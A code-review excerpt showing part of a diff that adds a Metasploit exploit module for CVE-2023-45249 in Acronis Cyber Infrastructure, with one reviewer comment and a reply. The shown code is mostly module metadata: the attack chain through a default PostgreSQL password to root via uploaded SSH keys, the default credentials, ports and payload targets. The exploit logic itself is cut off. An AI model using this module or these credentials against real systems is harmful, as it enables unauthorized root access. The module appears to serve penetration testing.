modules/exploits/linux/http/acronis_cyber_infra_cve_2023_45249.rb

```diff
@@ -0,0 +1,338 @@
+          This module exploits a default password vulnerability in ACI which allow an attacker to access
+          the ACI PostgreSQL database and gain administrative access to the ACI Web Portal.
+          This opens the door for the attacker to upload SSH keys that enables root access
+          to the appliance/server. This attack can be remotely executed over the WAN as long as the
+          PostgreSQL and SSH services are exposed to the outside world.
+          ACI versions 5.0 before build 5.0.1-61, 5.1 before build 5.1.1-71, 5.2 before build 5.2.1-69,
+          5.3 before build 5.3.1-53, and 5.4 before build 5.4.4-132 are vulnerable.
+        },
+        'Author' => [
+          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Metasploit module
+          'Acronis International GmbH', # discovery
+        ],
+        'References' => [
+          ['CVE', '2023-45249'],
+          ['URL', 'https://security-advisory.acronis.com/advisories/SEC-6452'],
+          ['URL', 'https://attackerkb.com/topics/T2b62daDsL/cve-2023-45249']
+        ],
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix', 'linux'],
+        'Privileged' => true,
+        'Arch' => [ARCH_CMD],
+        'Targets' => [
+          [
+            'Unix/Linux Command',
+            {
+              'Platform' => ['unix', 'linux'],
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd
+            }
+          ],
+          [
+            'Interactive SSH',
+            {
+              'Type' => :ssh_interact,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'generic/ssh/interact'
+              },
+              'Payload' => {
+                'Compat' => {
+                  'PayloadType' => 'ssh_interact'
+                }
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2024-07-24',
+        'DefaultOptions' => {
+          'SSL' => true,
+          'RPORT' => 8888,
+          'USERNAME' => 'vstoradmin',
+          'PASSWORD' => 'vstoradmin',
+          'DATABASE' => 'keystone',
+          'SSH_TIMEOUT' => 30,
+          'WfsDelay' => 5
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
+          'Reliability' => [REPEATABLE_SESSION]
+        }
+      )
+    )
+    deregister_options('SQL', 'RETURN_ROWSET', 'VERBOSE')
+    register_options([
+      OptString.new('TARGETURI', [true, 'Path to the Acronis Cyber Infra application', '/']),
+      OptBool.new('STORE_CRED', [false, 'Store user admin credentials into the database.', true]),
+      OptPort.new('DBPORT', [true, 'PostgreSQL DB port', 5432]),
+      OptPort.new('SSHPORT', [true, 'SSH port', 22])
+    ])
+    register_advanced_options([
+      OptInt.new('ConnectTimeout', [ true, 'Maximum number of seconds to establish a TCP connection', 10])
+    ])
+  end
+
+  def run_query(query)
```

Comment:
Could this method return `@res_query` and then raise an exception in the event something goes wrong?

Reply:
Done. Removed `run_query()` and used `postgres_query()` which actually does the job.